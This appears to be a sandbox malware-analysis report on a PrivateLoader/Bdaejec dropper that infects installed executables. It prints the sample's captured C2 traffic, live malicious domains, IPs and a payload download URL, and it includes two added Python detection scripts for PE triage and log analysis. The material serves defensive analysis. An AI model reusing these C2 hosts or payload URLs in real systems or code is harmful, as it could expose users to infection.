Windows Analysis Report
611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe

Overview

General Information

Sample name: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
Analysis ID: 1480302
MD5: 5ae2c7e495880d7e209a41158fd72984
SHA1: f2bd4549f77a5c6af49259b60caf937b31decbf0
SHA256: 9664f55603f168dc5f7ac498789f5275b2c64fb5ad1bc7c185944421bd5a8777
Tags: exe

Detection

Bdaejec, PrivateLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected PrivateLoader
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Process Tree

  • System is w10x64
  • 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe (PID: 3792 cmdline: "C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe" MD5: 5AE2C7E495880D7E209A41158FD72984)
    • vXQpuA.exe (PID: 5064 cmdline: C:\Users\user\AppData\Local\Temp\vXQpuA.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 1220 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1392 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Yara matches on the submitted sample
Source | Rule | Description | Author | Strings
611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security
611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | MALWARE_Win_DLInjector06 | Detects downloader / injector | ditekSHen
    • 0x586f0:$s1: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    • 0x58218:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x58280:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x582e8:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x58350:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x583b8:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x58420:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x58488:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x58518:$s2: Content-Type: application/x-www-form-urlencoded
    • 0x584ec:$s3: https://ipinfo.io/
    • 0x5857c:$s4: https://db-ip.com/
    • 0x585d8:$s5: https://www.maxmind.com/en/locate-my-ip-address
    • 0x585a4:$s6: https://ipgeolocation.io/
    • 0x586e4:$s7: POST

Yara matches in process memory
Source | Rule | Description | Author | Strings
00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security
00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security
Process Memory Space: vXQpuA.exe PID: 5064 | JoeSecurity_Bdaejec | Yara detected Bdaejec | Joe Security

Yara matches on unpacked PE images
Source | Rule | Description | Author | Strings
0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security
0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack | MALWARE_Win_DLInjector06 | Detects downloader / injector | ditekSHen | Strings $s1-$s7 at the same offsets as the sample match above
0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack | JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security
0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack | MALWARE_Win_DLInjector06 | Detects downloader / injector | ditekSHen | Strings $s1-$s7 at the same offsets as the sample match above
              No Sigma rule has matched
              No Snort rule has matched
Timestamp: 2024-07-24T17:26:53.131145+0200 | SID: 2838522 | Source Port: 60858 | Destination Port: 53 | Protocol: UDP | Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-24T17:26:51.124380+0200 | SID: 2838522 | Source Port: 60858 | Destination Port: 53 | Protocol: UDP | Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-24T17:26:52.119126+0200 | SID: 2838522 | Source Port: 60858 | Destination Port: 53 | Protocol: UDP | Classtype: Malware Command and Control Activity Detected
Timestamp: 2024-07-24T17:27:38.899025+0200 | SID: 2043080 | Source Port: 52169 | Destination Port: 53 | Protocol: UDP | Classtype: Malware Command and Control Activity Detected


              AV Detection

Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Avira: detected
Source: http://ddos.dnsnb8.net:799/cj//k1.rarx | Avira URL Cloud: Label: malware
Source: https://softs-portal.com/api/registerUser.phpg | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarDownloadManager | Avira URL Cloud: Label: malware
Source: https://softs-portal.com/api/registerUser.php | Avira URL Cloud: Label: malware
Source: http://wfsdragon.ru/api/setStats.php | Avira URL Cloud: Label: phishing
Source: http://wfsdragon.ru:80/api/setStats.php | Avira URL Cloud: Label: phishing
Source: https://softs-portal.com/ | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar | Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rar0 | Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar& | Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarras | Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarI | Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarW | Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/ | Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rare | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | ReversingLabs: Detection: 92%
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | ReversingLabs: Detection: 97%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.9% probability
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Joe Sandbox ML: detected
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Joe Sandbox ML: detected
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb | source: SciTE.exe.1.dr

              Spreading

Source: Yara match | File source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLE
Source: Yara match | File source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
Source: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe | Code function 0_2_00357261: FindFirstFileExW
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function 1_2_006129E2: memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function 1_2_00612B8C: memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
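The signatures listed for this sample ("PE file has a writeable .text section", "Entry point lies outside standard sections", "PE file contains section with special chars") and the three system binaries that vXQpuA.exe overwrote are the traits a responder would look for on other hosts. The following is an added example, not Joe Sandbox code and not the sample's, that reads the PE headers directly without a third-party library and reports those traits. The set of "standard" code section names, the file-extension filter in scan_tree and the build_pe helper that fabricates a header-only test image are assumptions made for the example; a hit is a triage lead, and the file's hash against a known-good copy remains the authoritative check.

```python
import os
import struct
from typing import Iterator, List, NamedTuple, Tuple

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Assumption: section names a linker normally places the entry point in.
STANDARD_CODE_SECTIONS = {".text", ".textbss", ".code", "CODE", "INIT"}
NAME_OK = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$")


class Section(NamedTuple):
    name: str
    virtual_size: int
    virtual_address: int
    raw_size: int
    characteristics: int


def parse_pe(data: bytes) -> Tuple[int, List[Section]]:
    """Return (AddressOfEntryPoint, sections) from the headers only; ValueError if not a PE."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER, 20 bytes
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    sections, off = [], opt + opt_size                    # section table follows it
    for _ in range(nsections):
        raw_name, vsize, vaddr, rsize, _rp, _rl, _ln, _nr, _nl, chars = \
            struct.unpack_from("<8sIIIIIIHHI", data, off)
        sections.append(Section(raw_name.rstrip(b"\0").decode("latin-1"),
                                vsize, vaddr, rsize, chars))
        off += 40
    return entry_point, sections


def triage(data: bytes) -> List[str]:
    """Return human-readable findings; an empty list means nothing tripped."""
    entry_point, sections = parse_pe(data)
    findings, ep_section = [], None
    for s in sections:
        span = max(s.virtual_size, s.raw_size)
        if s.virtual_address <= entry_point < s.virtual_address + span:
            ep_section = s
        writable = bool(s.characteristics & IMAGE_SCN_MEM_WRITE)
        executable = bool(s.characteristics & IMAGE_SCN_MEM_EXECUTE)
        if s.name.startswith(".text") and writable:
            findings.append(f"writable .text section ({s.name})")
        elif writable and executable:
            findings.append(f"section {s.name!r} is both writable and executable")
        if any(c not in NAME_OK for c in s.name):
            findings.append(f"section name with special chars: {s.name!r}")
    if ep_section is None:
        findings.append(f"entry point 0x{entry_point:x} maps to no section")
    elif ep_section.name not in STANDARD_CODE_SECTIONS:
        findings.append(f"entry point 0x{entry_point:x} lies in "
                        f"non-standard section {ep_section.name!r}")
    return findings


def scan_tree(root: str) -> Iterator[Tuple[str, List[str]]]:
    """Walk a directory tree (e.g. Program Files) and yield (path, findings)
    for every PE that trips a check; unreadable or non-PE files are skipped."""
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".exe", ".dll", ".sys", ".scr")):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    findings = triage(fh.read())
            except (OSError, ValueError, struct.error):
                continue
            if findings:
                yield path, findings


def build_pe(sections, entry_point: int) -> bytes:
    """Constructed header-only PE32 image for testing. sections is a list of
    (name, virtual_address, virtual_size, characteristics); no code is emitted."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                                  # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                 # Magic = PE32
    struct.pack_into("<I", opt, 16, entry_point)          # AddressOfEntryPoint
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("latin-1").ljust(8, b"\0"),
                    vsize, vaddr, vsize, 0, 0, 0, 0, 0, chars)
        for name, vaddr, vsize, chars in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
```

Run `scan_tree(r"C:\Program Files")` on a suspect host and compare the hit list with the three paths above; a clean Windows install will still produce occasional hits from packed or self-extracting installers, so treat the output as a worklist, not a verdict.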

              Networking

Source: Yara match | File source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, type: SAMPLE
Source: Yara match | File source: 0.0.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2033107820.0000000000311000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: unknown | DNS query: name: pastebin.com
Source: Joe Sandbox View | IP Address: 212.193.30.21
Source: Joe Sandbox View | IP Address: 104.20.4.235
Source: Joe Sandbox View | IP Address: 212.193.30.45
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    Host: telegram.org
Source: global traffic | HTTP traffic detected:
    GET /raw/A7dSG1te HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    Host: pastebin.com
Source: global traffic | HTTP traffic detected:
    GET /proxies.txt HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    Host: 212.193.30.45
Source: global traffic | HTTP traffic detected:
    GET /server.txt HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    Host: 212.193.30.29
Source: global traffic | HTTP traffic detected:
    GET /api/setStats.php HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    Host: wfsdragon.ru
Source: global traffic | HTTP traffic detected (same request observed four times):
    POST /service/communication.php HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    Content-Length: 25
    Host: 212.193.30.21
Source: unknown | TCP traffic detected without corresponding DNS query: 212.193.30.45 (12 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 212.193.30.29 (5 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 212.193.30.21 (22 connections)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (7 datagrams)
Source: C:\Users\user\AppData\Local\Temp\vXQpuA.exe | Code function 1_2_00611099: wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep
Source: global traffic | DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic | DNS traffic detected: DNS query: telegram.org
Source: global traffic | DNS traffic detected: DNS query: pastebin.com
Source: global traffic | DNS traffic detected: DNS query: wfsdragon.ru
Source: global traffic | DNS traffic detected: DNS query: softs-portal.com
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Wed, 24 Jul 2024 15:27:37 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    x-frame-options: DENY
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-content-type-options: nosniff
    x-xss-protection: 1;mode=block
    x-xss-protection: 1;mode=block
    cache-control: public, max-age=1801
    CF-Cache-Status: MISS
    Server: cloudflare
    CF-RAY: 8a84ef70ddba72ab-EWR
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Wed, 24 Jul 2024 15:27:38 GMT
    Content-Type: text/html; charset=iso-8859-1
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HEB0ODgbQzdwXbrO%2Fmpcx54rLT3TkSjyztoRT9GMG4OZ5uvC42Wh%2FHFnkCtG3M1maOMLwGfOWQirUg6Hnn8v1vkJfbpuzpi%2F3vDyLzjPstrI%2FskReRpENmzfzUQepU%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8a84ef7a1d151a30-EWR
    alt-svc: h3=":443"; ma=86400
    Data Ascii (body, truncated in the report): 46e<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8a84ef7a1d151a30',t:'MTcyMTgzNDg1OC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.sr
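The request pattern captured above (one fixed Chrome/74 user agent on every request, a pastebin raw fetch, then plain-HTTP GETs of proxies.txt and server.txt and POSTs to /service/communication.php on bare IP addresses that were never resolved through DNS) is what a proxy or DNS log shows on an infected host. The block below is an added example, not Joe Sandbox code and not a vendor signature, that runs those checks over constructed, tab-separated log records. The record format, the client addresses, the benign 192.168.2.7 lines and the small indicator lists (lifted from this report only) are assumptions for the example; the "no preceding DNS resolution" check is only meaningful when DNS answers and HTTP requests come from the same log source in time order.

```python
import ipaddress
from typing import Iterable, List, Tuple
from urllib.parse import urlsplit

# Exact user agent hard-coded in the sample (copied from the requests above).
PRIVATELOADER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                    "(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36")
# Indicators from this report only; a real deployment would load a feed instead.
KNOWN_C2_HOSTS = {"ddos.dnsnb8.net", "wfsdragon.ru", "softs-portal.com",
                  "212.193.30.21", "212.193.30.29", "212.193.30.45"}
STAGING_PATHS = {"/proxies.txt", "/server.txt", "/service/communication.php"}


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyse(records: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (timestamp, reason) alerts. Assumed record format, tab-separated:
       ts  client  DNS   name    answer_ip_or_NXDOMAIN
       ts  client  HTTP  method  url  user_agent"""
    resolved = set()          # IPs handed out by DNS so far, in log order
    alerts = []
    for line in records:
        f = line.rstrip("\n").split("\t")
        if len(f) < 3:
            continue
        ts, kind = f[0], f[2]
        if kind == "DNS" and len(f) >= 5:
            name, answer = f[3].lower(), f[4]
            if is_ip_literal(answer):
                resolved.add(answer)
            if name in KNOWN_C2_HOSTS:
                alerts.append((ts, f"DNS query for known C2 domain {name}"))
        elif kind == "HTTP" and len(f) >= 6:
            method, url, ua = f[3], f[4], f[5]
            parts = urlsplit(url)
            host, path = (parts.hostname or "").lower(), parts.path
            if ua == PRIVATELOADER_UA:
                alerts.append((ts, f"PrivateLoader user agent to {host}"))
            if host == "pastebin.com" and path.startswith("/raw/"):
                alerts.append((ts, f"pastebin raw fetch {path} (likely C2 address lookup)"))
            if is_ip_literal(host):
                if host not in resolved:
                    alerts.append((ts, f"HTTP to IP literal {host} with no preceding DNS resolution"))
                if path in STAGING_PATHS:
                    alerts.append((ts, f"{method} {path} on {host} (PrivateLoader staging/C2 path)"))
            if host in KNOWN_C2_HOSTS:
                alerts.append((ts, f"traffic to known C2 host {host}"))
    return alerts


# Constructed log records modelled on the traffic in this report; the two
# 192.168.2.7 lines are benign and exist to show they raise nothing.
SAMPLE_LOG = [
    "2024-07-24T17:26:50\t192.168.2.5\tDNS\tpastebin.com\t104.20.4.235",
    "2024-07-24T17:26:51\t192.168.2.5\tHTTP\tGET\thttps://pastebin.com/raw/A7dSG1te\t" + PRIVATELOADER_UA,
    "2024-07-24T17:26:52\t192.168.2.5\tHTTP\tGET\thttp://212.193.30.45/proxies.txt\t" + PRIVATELOADER_UA,
    "2024-07-24T17:26:53\t192.168.2.5\tHTTP\tPOST\thttp://212.193.30.21/service/communication.php\t" + PRIVATELOADER_UA,
    "2024-07-24T17:26:53\t192.168.2.5\tDNS\tddos.dnsnb8.net\tNXDOMAIN",
    "2024-07-24T17:27:00\t192.168.2.7\tDNS\twww.example.com\t203.0.113.10",
    "2024-07-24T17:27:01\t192.168.2.7\tHTTP\tGET\thttps://www.example.com/\tMozilla/5.0 (X11; Linux x86_64) Firefox/128.0",
]

if __name__ == "__main__":
    for ts, reason in analyse(SAMPLE_LOG):
        print(ts, reason)
```

The user-agent check is the strongest single signal here: Chrome 74 dates from 2019, so an exact match on that string from a current Windows 10 host is almost never legitimate, whereas the bare-IP and pastebin checks each need the others (or the sandbox's Suricata hits) before they justify an incident.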
Source: vXQpuA.exe, 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmp, vXQpuA.exe, 00000001.00000003.2034288446.0000000000A40000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000D0B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.21/
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.21/Corporation1
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.21/hp
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.21/hp0
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.21/service/communication.php
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.21/service/communication.php$
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.21/service/communication.php0
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.21/service/communication.phpK
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000D06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.21/service/communication.phpk_
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.21:80/service/communication.php
Source: 611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, 00000000.00000002.3286736589.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.30.29/
